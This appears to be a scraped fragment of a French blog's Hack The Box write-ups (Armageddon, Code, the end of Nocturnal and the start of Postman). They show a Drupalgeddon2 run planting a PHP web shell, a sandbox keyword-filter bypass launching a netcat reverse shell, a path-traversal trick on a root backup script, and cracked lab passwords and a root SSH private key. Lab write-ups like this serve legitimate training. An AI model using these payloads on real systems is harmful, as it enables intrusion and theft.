remplacer un caractère espace. Le problème c\u0026rsquo;est que ca n\u0026rsquo;a pas fonctionné car c\u0026rsquo;était remplacé par \u0026ldquo;%XX%XX\u0026rdquo; avec d\u0026rsquo;autre valeur a cause de l\u0026rsquo;URL encoding. Attention donc a bien testé les parametres injectables directement dans BURP pour eviter qu\u0026rsquo;il y ait un URL encoding qui s\u0026rsquo;applique sans qu\u0026rsquo;on le sache.\n","date":"2025-04-16T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/nocturnal-htb/","title":"HTB | Nocturnal"},{"content":" Machine name OS IP Difficulty Armageddon Linux 10.10.10.79 Easy Users 1 2 drupaluser : CQHEy@9M*m23gBVj brucetherealadmin Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 ┌──(kali㉿kali)-[~/htb/Armageddon] └─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.233 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDC2xdFP3J4cpINVArODYtbhv+uQNECQHDkzTeWL+4aLgKcJuIoA8dQdVuP2UaLUJ0XtbyuabPEBzJl3IHg3vztFZ8UEcS94KuWP09ghv6fhc7JbFYONVJTYLiEPD8nrS/V2EPEQJ2ubNXcZAR76X9SZqt11JTyQH/s6tPH+m3m/84NUU8PNb/dyhrFpCUmZzzJQ1zCDStLXJnCAOE7EfW2wNm1CBPCXn1wNvO3SKwokCm4GoMKHSM9rNb9FjGLIY0nq+8mt7RTJZ+WLdHsje3AkBk1yooGFF+0TdOj42YK2OtAKDQBWnBm1nqLQsmm/Va9T2bPYLLK5aUd4/578u7h | 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBE4kP4gQ5Th3eu3vz/kPWwlUCm+6BSM6M3Y43IuYVo3ppmJG+wKiabo/gVYLOwzG7js497Vr7eGIgsjUtbIGUrY= | 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG9ZlC3EA13xZbzvvdjZRWhnu9clFOUe7irG8kT0oR4A 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) | http-robots.txt: 36 disallowed entries | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt | /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php | /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/ | /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/ | /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/ |_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/ |_http-title: Welcome to Armageddon | Armageddon |_http-generator: Drupal 7 (http://drupal.org) |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-favicon: Unknown favicon MD5: 1487A9908F898326EBABFFFD2407920D Foothold Drupal 7.56 On remarque dans le code source la version du framework utilisé : Drupal 7.\nOn trouve le dossier: http://10.10.10.233/scripts/ Les scripts datent du 21 juin 2017.\nEn regardant les releases de Drupal sur github, on découvre que la version Drupal 7.56 est sortie précisement à cette date : https://github.com/drupal/drupal/releases/tag/7.56\nAvec searchsploit, on trouve une RCE (sans authentification préalable) :\n1 2 3 4 5 6 7 8 ┌──(kali㉿kali)-[~/htb/Armageddon] └─$ searchsploit drupal 7.56 --------------------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------------------- --------------------------------- ... Drupal \u0026lt; 7.58 / \u0026lt; 8.3.9 / \u0026lt; 8.4.6 / \u0026lt; 8.5.1 - \u0026#39;Drupalgeddon2\u0026#39; Remote Code Execution | php/webapps/44449.rb ... Output:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 ┌──(kali㉿kali)-[~/htb/Armageddon] └─$ ruby drupalggedon2.rb http://10.10.10.233 [*] --==[::#Drupalggedon2::]==-- -------------------------------------------------------------------------------- [i] Target : http://10.10.10.233/ -------------------------------------------------------------------------------- [+] Found : http://10.10.10.233/CHANGELOG.txt (HTTP Response: 200) [+] Drupal!: v7.56 -------------------------------------------------------------------------------- [*] Testing: Form (user/password) [+] Result : Form valid - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Clean URLs [!] Result : Clean URLs disabled (HTTP Response: 404) [i] Isn\u0026#39;t an issue for Drupal v7.x -------------------------------------------------------------------------------- [*] Testing: Code Execution (Method: name) [i] Payload: echo YAQXUKKI [+] Result : YAQXUKKI [+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO! -------------------------------------------------------------------------------- [*] Testing: Existing file (http://10.10.10.233/shell.php) [!] Response: HTTP 200 // Size: 6. ***Something could already be there?*** - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Writing To Web Root (./) [i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php [+] Result : \u0026lt;?php if( isset( $_REQUEST[\u0026#39;c\u0026#39;] ) ) { system( $_REQUEST[\u0026#39;c\u0026#39;] . \u0026#39; 2\u0026gt;\u0026amp;1\u0026#39; ); } [+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!! -------------------------------------------------------------------------------- [i] Fake PHP shell: curl \u0026#39;http://10.10.10.233/shell.php\u0026#39; -d \u0026#39;c=hostname\u0026#39; armageddon.htb\u0026gt;\u0026gt; whoami apache Mysql Database On trouve dans un fichier settings.php les creds pour la base de donnée mysql de Drupal.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 $databases = array ( \u0026#39;default\u0026#39; =\u0026gt; array ( \u0026#39;default\u0026#39; =\u0026gt; array ( \u0026#39;database\u0026#39; =\u0026gt; \u0026#39;drupal\u0026#39;, \u0026#39;username\u0026#39; =\u0026gt; \u0026#39;drupaluser\u0026#39;, \u0026#39;password\u0026#39; =\u0026gt; \u0026#39;CQHEy@9M*m23gBVj\u0026#39;, \u0026#39;host\u0026#39; =\u0026gt; \u0026#39;localhost\u0026#39;, \u0026#39;port\u0026#39; =\u0026gt; \u0026#39;\u0026#39;, \u0026#39;driver\u0026#39; =\u0026gt; \u0026#39;mysql\u0026#39;, \u0026#39;prefix\u0026#39; =\u0026gt; \u0026#39;\u0026#39;, ), ), ); Getting hashes from bruce and admin Toujours depuis le shell obtenu avec l\u0026rsquo;exploit (pas interfactif ! Mais assez stable). On récupère le hachage de bruce et admin :\n1 2 3 4 armageddon.htb\u0026gt;\u0026gt; mysql -u drupaluser -pCQHEy@9M*m23gBVj -D drupal -e \u0026#34;SELECT * FROM users\u0026#34; uid name pass mail theme signature signature_format created access login status timezone language picture init data 0 NULL 0 0 0 0 NULL 0 NULL 1 brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt admin@armageddon.eu filtered_html 1606998756 1607077194 1607076276 1 Europe/London 0 admin@armageddon.eu a:1:{s:7:\u0026#34;overlay\u0026#34;;i:1;} Cracking hashes of bruce (user.txt) On le crack avec hashcat :\n1 2 3 4 5 6 7 8 9 10 hashcat ./hash.txt ~/wordlists/rockyou.txt --show Hash-mode was not specified with -m. Attempting to auto-detect hash mode. The following mode was auto-detected as the only one matching your input hash: 7900 | Drupal7 | Forums, CMS, E-Commerce NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed! Do NOT report auto-detect issues unless you are certain of the hash type. $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo On se connecte en ssh à l\u0026rsquo;utilisateur brucetherealadmin :\n1 2 3 4 5 6 7 8 9 10 11 ┌──(kali㉿kali)-[~/htb/Armageddon] └─$ ssh brucetherealadmin@10.10.10.233 brucetherealadmin@10.10.10.233\u0026#39;s password: Last failed login: Thu Apr 3 22:28:06 BST 2025 from 10.10.14.17 on ssh:notty There were 3 failed login attempts since the last successful login. Last login: Fri Mar 19 08:01:19 2021 from 10.10.14.5 [brucetherealadmin@armageddon ~]$ [brucetherealadmin@armageddon ~]$ whoami brucetherealadmin [brucetherealadmin@armageddon ~]$ cat user.txt f0f8.....bbcc Privilege Escalation snap install as root Il faut faire sudo -l. On observe qu\u0026rsquo;on peut executer \u0026ldquo;snap install\u0026rdquo; en tant que root. C\u0026rsquo;est à dire que l\u0026rsquo;on peut installer n\u0026rsquo;importe quel package snap en tant que root. Or, j\u0026rsquo;ai pu créer un packet vérolé qui s\u0026rsquo;installe et s\u0026rsquo;execute lors de l\u0026rsquo;installation, permettant l\u0026rsquo;ouverture d\u0026rsquo;un shell en tant que root.\n","date":"2025-04-07T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/armageddon-htb/","title":"HTB | Armageddon"},{"content":" Machine name OS IP Difficulty Code Linux 10.10.11.62 Easy Users 1 2 martin:nafeelswordsmaster development:development Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 ┌──(kali㉿kali)-[~/htb] └─$ nmap -sC -sV -An -p- -vvv -T4 10.10.11.62 PORT STATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 b5:b9:7c:c4:50:32:95:bc:c2:65:17:df:51:a2:7a:bd (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCrE0z9yLzAZQKDE2qvJju5kq0jbbwNh6GfBrBu20em8SE/I4jT4FGig2hz6FHEYryAFBNCwJ0bYHr3hH9IQ7ZZNcpfYgQhi8C+QLGg+j7U4kw4rh3Z9wbQdm9tsFrUtbU92CuyZKpFsisrtc9e7271kyJElcycTWntcOk38otajZhHnLPZfqH90PM+ISA93hRpyGyrxj8phjTGlKC1O0zwvFDn8dqeaUreN7poWNIYxhJ0ppfFiCQf3rqxPS1fJ0YvKcUeNr2fb49H6Fba7FchR8OYlinjJLs1dFrx0jNNW/m3XS3l2+QTULGxM5cDrKip2XQxKfeTj4qKBCaFZUzknm27vHDW3gzct5W0lErXbnDWQcQZKjKTPu4Z/uExpJkk1rDfr3JXoMHaT4zaOV9l3s3KfrRSjOrXMJIrImtQN1l08nzh/Xg7KqnS1N46PEJ4ivVxEGFGaWrtC1MgjMZ6FtUSs/8RNDn59Pxt0HsSr6rgYkZC2LNwrgtMyiiwyas= | 256 94:b5:25:54:9b:68:af:be:40:e1:1d:a8:6b:85:0d:01 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDiXZTkrXQPMXdU8ZTTQI45kkF2N38hyDVed+2fgp6nB3sR/mu/7K4yDqKQSDuvxiGe08r1b1STa/LZUjnFCfgg= | 256 12:8c:dc:97:ad:86:00:b4:88:e2:29:cf:69:b5:65:96 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIP8Cwf2cBH9EDSARPML82QqjkV811d+Hsjrly11/PHfu 5000/tcp open http syn-ack Gunicorn 20.0.4 |_http-title: Python Code Editor | http-methods: |_ Supported Methods: GET HEAD OPTIONS |_http-server-header: gunicorn/20.0.4 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Foothold Python sandbox (port 5000) Sur le port 5000, on trouve une sandbox, permettant d\u0026rsquo;executer du code Python. Cependant, après quelques tests on remarque que certains mot-clés sont interdits, empêchant l\u0026rsquo;execution de certaines commandes.\nRestricted keywords J\u0026rsquo;ai fait une liste au fur et a mesure des keywords non acceptés\n1 2 3 4 5 6 7 ## Restricted keywords import os read popen open __builtins__ app-production reverse shell J\u0026rsquo;ai finalement réussi à bypasser la restriction en trouvant les mots clés permettant une execution de code à distance :\n1 2 3 4 5 6 7 8 9 ## On bypass la restriction sur le mot clé \u0026#34;os\u0026#34; lib = globals()[\u0026#34;o\u0026#34;+\u0026#34;s\u0026#34;] ## on bypass la restriction sur le mot clé \u0026#34;system\u0026#34; cmd = \u0026#34;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2\u0026gt;\u0026amp;1|nc 10.10.14.4 1337 \u0026gt;/tmp/f\u0026#34; getattr(lib, \u0026#34;syst\u0026#34; + \u0026#34;em\u0026#34;)(cmd) # Exécuter la commande ## Affiche la liste des dossiers print(lib.listdir(\u0026#34;/home/app-production\u0026#34;)) 1 2 3 4 5 6 7 8 9 10 11 12 ┌──(kali㉿kali)-[~/htb/Code] └─$ nc -lnvp 1337 listening on [any] 1337 ... connect to [10.10.14.4] from (UNKNOWN) [10.10.11.62] 32960 bash: cannot set terminal process group (5014): Inappropriate ioctl for device bash: no job control in this shell app-production@code:~/app$ whoami whoami app-production app-production@code:~/app$ cat ../user.txt cat ../user.txt 8f81.....e49f database.db : martin\u0026rsquo;s password On trouve un fichier database.db.\n1 2 3 4 5 6 7 8 9 10 11 app-production@code:~/app$ grep -rni pass app.py:17: password = db.Column(db.String(80), nullable=False) app.py:43: password = hashlib.md5(request.form[\u0026#39;password\u0026#39;].encode()).hexdigest() app.py:48: new_user = User(username=username, password=password) app.py:60: password = hashlib.md5(request.form[\u0026#39;password\u0026#39;].encode()).hexdigest() app.py:61: user = User.query.filter_by(username=username, password=password).first() ... ... \u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026gt;\u0026gt; Binary file instance/database.db matches \u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026lt;\u0026gt;\u0026gt; On trouve rapidement un hachage du mot de passe de martin, en affichant directement database.db sans meme passer par sqlite.\n1 2 3 4 5 6 app-production@code:~/app$ grep -rnia martin ## 3de6f30c4a09c27fc71932bfc68474be \u0026lt;----------- ���QQR*Mmartin3de6f30c4a09c27fc71932bfc68474be/#Mdevelopment759b74ce43947f5f4c91aeddc3e5bad3 ���\u0026amp;$nceCprint(\u0026#34;Functionality test\u0026#34;)Testent $ hashcat -m 0 hash.txt --wordlist ~/wordlists/rockyou.txt --show 3de6f30c4a09c27fc71932bfc68474be:nafeelswordsmaster development account :\n1 2 $ hashcat -m 0 hash2.txt --wordlist ~/wordlists/rockyou.txt --show 759b74ce43947f5f4c91aeddc3e5bad3:development Privilege Escalation Enumeration with martin Martin peut executer en tant que root le script /usr/bin/backy.sh :\n1 2 3 4 5 6 7 martin@code:/home/app-production/app$ sudo -l Matching Defaults entries for martin on localhost: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin User martin may run the following commands on localhost: (ALL : ALL) NOPASSWD: /usr/bin/backy.sh Exploit : /usr/bin/backy.sh On met \u0026ldquo;\u0026hellip;.\u0026rdquo; au lieu de \u0026ldquo;..\u0026rdquo; et \u0026ldquo;//\u0026rdquo; au lieu de \u0026ldquo;/\u0026rdquo; car il remplace \u0026ldquo;../\u0026rdquo; quand il le voit. mais quand on eneleve \u0026ldquo;../\u0026rdquo; dans mon cas, ca reconstruit un autre \u0026ldquo;../\u0026rdquo; ! Donc ca marche.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 martin@code:~$ cat t.json { \u0026#34;destination\u0026#34;: \u0026#34;/home/martin/backups/\u0026#34;, \u0026#34;multiprocessing\u0026#34;: true, \u0026#34;verbose_log\u0026#34;: false, \u0026#34;directories_to_archive\u0026#34;: [ \u0026#34;/home/....//root/root.txt\u0026#34; ], \u0026#34;exclude\u0026#34;: [ \u0026#34;.*\u0026#34; ] } ------------------------------------ ## En remplacant par ca, on archive bien le dossier root martin@code:~$ cat task.json { \u0026#34;destination\u0026#34;: \u0026#34;/home/martin/backups/\u0026#34;, \u0026#34;multiprocessing\u0026#34;: true, \u0026#34;verbose_log\u0026#34;: false, \u0026#34;directories_to_archive\u0026#34;: [ \u0026#34;/home/....//root\u0026#34;, \u0026#34;/var/....//root\u0026#34; ] } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 martin@code:~$ sudo /usr/bin/backy.sh ./task.json 2025/03/26 11:09:19 🍀 backy 1.2 2025/03/26 11:09:19 📋 Working with ./task.json ... 2025/03/26 11:09:19 💤 Nothing to sync 2025/03/26 11:09:19 📤 Archiving: [/home/../root /var/../root] 2025/03/26 11:09:19 📥 To: /home/martin/backups ... 2025/03/26 11:09:19 📦 2025/03/26 11:09:19 📦 📦 martin@code:~/backups$ tar -xjf code_var_.._root_2025_March.tar.bz2 martin@code:~/backups$ ls code_home_app-production_app_2024_August.tar.bz2 code_home_.._root_2025_March.tar.bz2 code_var_.._root_2025_March.tar.bz2 root task.json martin@code:~/backups$ cd root/ martin@code:~/backups/root$ ls root.txt scripts martin@code:~/backups/root$ cat root.txt 80a6.....33d8 SSH root on récupère aussi les clés ssh de root :\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 martin@code:~/backups/root$ cd .ssh/ martin@code:~/backups/root/.ssh$ ls authorized_keys id_rsa martin@code:~/backups/root/.ssh$ cat id_rsa -----BEGIN OPENSSH PRIVATE KEY----- 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 hdENGN+hVCh//jFwAAAAlyb290QGNvZGU= -----END OPENSSH PRIVATE KEY----- martin@code:~/backups/root/.ssh$ cat authorized_keys ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/E/D3RVElqOCSPDFmpevzrlXwd78c0dWWGnQI/fo6wpKLQPMhngqyp+NOL9YBFzEtN7iWRVJUhXbkvLkzoR6ZZ44oDq9040/RBS/oXXGPx/h4KGt2nsE6FF7T7NYmdrx1gy25HYrQLFt136q8zuhAs9F6VAjLGhHi6eHrA6gh/gQvfhoS9AO7H7cawVSdPhgw2WMCzHJUWfebNHudRnwEAf9j3FX8q41I8PhKVWoGJSNQp+zbAPeCMsDhlBl4zmEAlKZV5mOl+RA50T774fy3Y/yoaWhsu9uhknauCFj0LCKZfT+DS4e9ylcBzpTwkmqj1TjVbOigCLpNbFZht07eaMmGbSy6cKKjnFO1zjgzSduGRFAGWI+eBoFiV4p2+0aJw8lvUu2O0TmUenL40+zUHgQjH5mUFVoVshqrGmoNUNQK/SqlrEgqHH+UqbBeJYRAiJ7R9eissOqyMvvkzu1j+78zvEG4aX4scY0GcKy+Mu8gDp8v325X4FMqukeGBX0= root@code On se connecte en utilisant la cle id_rsa recupere precedemment.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 ┌──(kali㉿kali)-[~/htb/Code] └─$ ssh root@10.10.11.62 -i id_rsa Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-208-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/pro System information as of Wed 26 Mar 2025 12:38:11 PM UTC System load: 0.06 Usage of /: 52.2% of 5.33GB Memory usage: 18% Swap usage: 0% Processes: 237 Users logged in: 1 IPv4 address for eth0: 10.10.11.62 IPv6 address for eth0: dead:beef::250:56ff:fe94:61f7 Expanded Security Maintenance for Applications is not enabled. 0 updates can be applied immediately. Enable ESM Apps to receive additional future security updates. See https://ubuntu.com/esm or run: sudo pro status The list of available updates is more than a week old. To check for new updates run: sudo apt update Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Wed Mar 26 12:38:11 2025 from 10.10.14.4 root@code:~# whoami root root@code:~# cat root.txt 80a6.....33d8 ","date":"2025-03-26T00:00:00Z","permalink":"https://leopoldabgn.github.io/writeups/p/code-htb/","title":"HTB | Code"},{"content":" Machine name OS IP Difficulty Postman Linux 10.10.10.160 Easy Users 1 2 ## SSH key pass phrase matt : computer2008 Enumeration nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 ┌──(kali㉿kali)-[~/htb/Postman] └─$ nmap -sC -sV -An -T4 -vvv -p- 10.10.10.160 PORTSTATE SERVICE REASON VERSION 22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDem1MnCQG+yciWyLak5YeSzxh4HxjCgxKVfNc1LN+vE1OecEx+cu0bTD5xdQJmyKEkpZ+AVjhQo/esF09a94eMNKcp+bhK1g3wqzLyr6kwE0wTncuKD2bA9LCKOcM6W5GpHKUywB5A/TMPJ7UXeygHseFUZEa+yAYlhFKTt6QTmkLs64sqCna+D/cvtKaB4O9C+DNv5/W66caIaS/B/lPeqLiRoX1ad/GMacLFzqCwgaYeZ9YBnwIstsDcvK9+kCaUE7g2vdQ7JtnX0+kVlIXRi0WXta+BhWuGFWtOV0NYM9IDRkGjSXA4qOyUOBklwvienPt1x2jBrjV8v3p78Tzz | 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIRgCn2sRihplwq7a2XuFsHzC9hW+qA/QsZif9QKAEBiUK6jv/B+UxDiPJiQp3KZ3tX6Arff/FC0NXK27c3EppI= | 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIF3FKsLVdJ5BN8bLpf80Gw89+4wUslxhI3wYfnS+53Xd 80/tcp open http syn-ack Apache httpd 2.4.29 ((Ubuntu)) | http-methods: |_ Supported Methods: GET POST OPTIONS HEAD |_http-favicon: Unknown favicon MD5: E234E3E8040EFB1ACD7028330A956EBF |_http-title: The Cyber Geek\u0026#39;s Personal Website |_http-server-header: Apache/2.4.29 (Ubuntu) 6379/tcp open redis syn-ack Redis key-value store 4.0.9 10000/tcp open http syn-ack MiniServ 1.910 (Webmin httpd) |_http-title: Site doesn\u0026#39;t have a title (text/html; Charset=iso-8859-1). | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-favicon: Unknown favicon MD5: 91549383E709F4F1DD6C8DAB07890301 Foothold Redis server 1 2 3 4 5 6 $ nc 10.10.10.160 6379 info $2729 ## Server redis_version:4.0.9 ... Ou\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 ┌──(kali㉿kali)-[~] └─$ nmap --script redis-info -sV -p 6379 10.10.10.160 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-13 08:55 EDT Nmap scan report for postman (10.10.10.160) Host is up (0.015s latency). PORT STATE SERVICE VERSION 6379/tcp open redis Redis key-value store 4.0.9 (64 bits) | redis-info: | Version: 4.0.9 | Operating System: Linux 4.15.0-58-generic x86_64 | Architecture: 64 bits | Process ID: 656 | Used CPU (sys): 4.58 | Used CPU (user): 1.78 | Connected clients: 1 | Connected slaves: 0 | Used memory: 820.55K | Role: master | Bind addresses: | 0.0.0.0 | ::1 | Client connections: |_ 10.10.14.13 redis user - SSH key upload A l\u0026rsquo;aide la page de hacktricks pentest de Redis 